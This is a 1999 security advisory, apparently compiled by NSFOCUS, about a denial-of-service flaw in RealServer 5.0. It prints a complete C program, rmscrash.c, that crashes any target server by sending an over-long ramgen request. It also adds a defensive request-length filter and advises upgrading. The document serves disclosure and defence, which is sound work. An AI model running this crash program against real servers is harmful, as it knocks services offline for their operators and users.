RealServer 5.0 ramgen Denial-of-Service Vulnerability

Published: 1999-12-23
Updated: 1999-12-24

Affected systems:
Real Networks Real Server 5.0
Unaffected systems:
Real Networks Real Server 7.0
Real Networks Real Server G2 1.0
   - Microsoft Windows NT 4.0
Description:
Sending a ramgen request larger than 4082 bytes to RealServer 5.0 can crash RealServer 5.0. Normal operation can be restored by restarting the RealServer software.


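Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!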

/*
*  rmscrash.c  - bow@bow.net
*
*  Crash a RealMedia 5.0 server by sending a very long ramgen request.
*
*  Test on:
*         $ pnserver -v
*         Version:        5.0-rvserver-build-290
*         Platform: FreeBSD-2.1.x
*
*/

#include        <stdio.h>
#include        <stdlib.h>
#include        <string.h>
#include        <sys/time.h>
#include        <sys/types.h>
#include        <unistd.h>
#include        <sys/socket.h>
#include        <netinet/in.h>
#include        <netdb.h>
  
#define BUFLEN 4082
  
char    buf[BUFLEN+14];
int     sock;
struct  sockaddr_in sa;
struct  hostent *hp;
  
int main (int argc, char *argv[]) {
        int i, port;

        if (argc < 3) {
                printf("Usage: %s realserver port\n",argv[0]);
                exit(-1);
        }
  
        port = atoi(argv[2]);
  
        memset(buf,0x41,BUFLEN);
        memcpy(buf,"GET /ramgen/",12);
        memcpy(buf+BUFLEN," HTTP/1.1\r\n\r\n", 13);
  
        if ((hp=(struct hostent *)gethostbyname(argv[1]))==NULL) {
                perror("gethostbyname()");
                exit(0);
        }
  
        if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
                perror("socket()");
                exit(0);
        }
  
        sa.sin_family=AF_INET;
        sa.sin_port=htons(port);
        memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length);
        if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) {
                perror("connect()");
                exit(0);
        }
  
        printf("Connected to %s. Sending data\n",argv[1]);
        write(sock,buf,strlen(buf));
        printf("Done.\n");
  
        close(sock);
        exit(0);
}


Recommendation:
Upgrade to RealServer G2 or 7.0
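
The length condition in the description can also be checked in front of a server that has not yet been upgraded. The following is an added example, not part of the original advisory or of any RealNetworks code: a request-line check that a filtering proxy could apply. The function name `ramgen_check`, the `verdict` enum, the use of 4082 as the cut-off and the sample requests are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define RAMGEN_MAX_LINE 4082   /* byte figure quoted in the advisory; a
                                  deployment may well choose a lower cap */

enum verdict { REQ_ALLOW = 0, REQ_REJECT = 1 };

/* Inspect the first bytes read from a client (not NUL-terminated).
 * Reject when the request line targets /ramgen/ and is longer than
 * max_line, or is still unterminated after max_line bytes. */
enum verdict ramgen_check(const char *buf, size_t len, size_t max_line)
{
    static const char prefix[] = "/ramgen/";
    const char *sp, *eol, *path;
    size_t line_len;

    /* The request line ends at the first LF; if none has arrived yet,
     * measure what has been received so far. */
    eol = memchr(buf, '\n', len);
    line_len = eol ? (size_t)(eol - buf) : len;

    /* The path starts after the first space that follows the method. */
    sp = memchr(buf, ' ', line_len);
    if (sp == NULL)
        return REQ_ALLOW;              /* not an HTTP request line */
    path = sp + 1;
    if ((size_t)(buf + line_len - path) < sizeof prefix - 1 ||
        memcmp(path, prefix, sizeof prefix - 1) != 0)
        return REQ_ALLOW;              /* other URLs are out of scope */

    return line_len > max_line ? REQ_REJECT : REQ_ALLOW;
}

int main(void)
{
    /* Constructed samples: a normal request and an over-long line. */
    static char longreq[5000];
    const char ok[] = "GET /ramgen/clip.rm HTTP/1.0\r\n\r\n";

    memset(longreq, 'A', sizeof longreq);
    memcpy(longreq, "GET /ramgen/", 12);

    printf("normal: %d\n", ramgen_check(ok, sizeof ok - 1, RAMGEN_MAX_LINE));
    printf("long:   %d\n", ramgen_check(longreq, sizeof longreq, RAMGEN_MAX_LINE));
    return 0;
}
```

The check works on a length-delimited buffer rather than a C string, so an unterminated or partially received line is measured as it stands.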

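This security vulnerability entry was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.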